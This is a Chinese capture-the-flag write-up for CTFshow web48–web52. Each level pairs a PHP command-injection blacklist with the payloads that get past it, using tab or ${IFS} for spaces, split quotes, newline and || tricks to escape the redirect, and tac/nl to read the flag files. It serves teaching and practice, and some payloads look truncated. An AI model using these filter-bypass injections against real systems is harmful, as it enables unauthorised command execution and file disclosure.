码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • CTFshow web48 49 50 51 52


    目录

    web48

    代码分析:

    payload:

    flag:

    web49

    代码分析:

    payload:

    flag:

    web50

    payload:

    flag:

    web51 

    代码分析:

    payload:

     flag:

    web52

    代码分析:

    payload:

    flag:


    web48

    代码分析:

    1. if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){
    2. system($c." >/dev/null 2>&1");
    3. }

    emm,这里过滤了很多用不上的东西,直接%09绕过空格,引号绕过flag%0a绕过后面的重定向就可以

    知识点:%09和%0a不算数字所以过滤[0-9]没有影响的

    payload:

    ?c=tac%09fl""ag.php||

    ?c=tac%09fl""ag.php%0a

    flag:

    ctfshow{d4152ec2-7b1b-48f4-9822-706bea5ddef6} 

    web49

    代码分析:

    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i", $c)){

    这道题过滤了百分号,但是仍然可以用前面的方法,跟%09不是数字一样,也可以用<绕过空格,引号绕过flag,||绕过重定向

    知识点:||运算前面成功则不执行后面

    payload:

    ?c=tac

    ?c=tac%09fl""ag.php%0a

    flag:

    ctfshow{f9e25313-a058-40ce-86bc-86d980db1303}

    web50

    代码分析:

    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)

    这题过滤了X09其实就是把%09过滤了,但是问题不大直接小于号绕过

    payload:

    ?c=tac

    ?c=tac

    flag:

    ctfshow{f6423ca9-8937-46c2-b232-fe172f434014}

    web51 

    代码分析:

    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c))

    把tac过滤了,可以使用nl替换,我还是喜欢tac,nl内容要用F12查看源代码,不如tac来的方便

    payload:

    ?c=nl

     flag:

    ctfshow{ba1d21a6-bcd4-4ece-a281-fb18d757dbb8}

    web52

    代码分析:

    if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\, $c)

    这题过滤了<,但是把$放出来了,尝试用了一下$IFS$1不行,感觉很奇怪后来才注意到数字给过滤了,那可以尝试一下${IFS}

    ?c=nl${IFS}fl""ag.php||

    看是看到了但是没有flag啊,到这我就懵逼了,查了大佬的题解发现这个flag.php是假的,真正的flag在别的地方

    ls看一下

    ls${IFS}/看一下上层目录

    发现上层目录中有个flag

    nl一下看看

    payload:

    nl${IFS}/fl""ag||

    flag:

     ctfshow{efe850f1-7eac-44ce-897f-b5c1d0509d5b}

  • 相关阅读:
    leetCode 76. 最小覆盖子串 + 滑动窗口 + 图解(详细)
    解决:Package ‘setuptools‘ requires a different Python: 3.7.16 not in ‘>=3.8‘
    发现流程任务的提交时间不对,@JsonFormat时间格式及时区问题
    Mybatis - Spring整合后一级缓存失效了
    黑客(网络安全)技术自学30天
    干货分享 | 关于同星硬件接口卡及TSMaster软件常见问题Q&A指南
    Gradle vs Maven
    评价指标和超参数调整进阶
    【虚幻引擎UE】UE4/UE5 基于2D屏幕坐标获取场景3D坐标 射线检测(蓝图/C++)
    34.nacos客户端读取共享配置文件实例(springcloud)
  • 原文地址:https://blog.csdn.net/qq_40345591/article/details/127784493
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号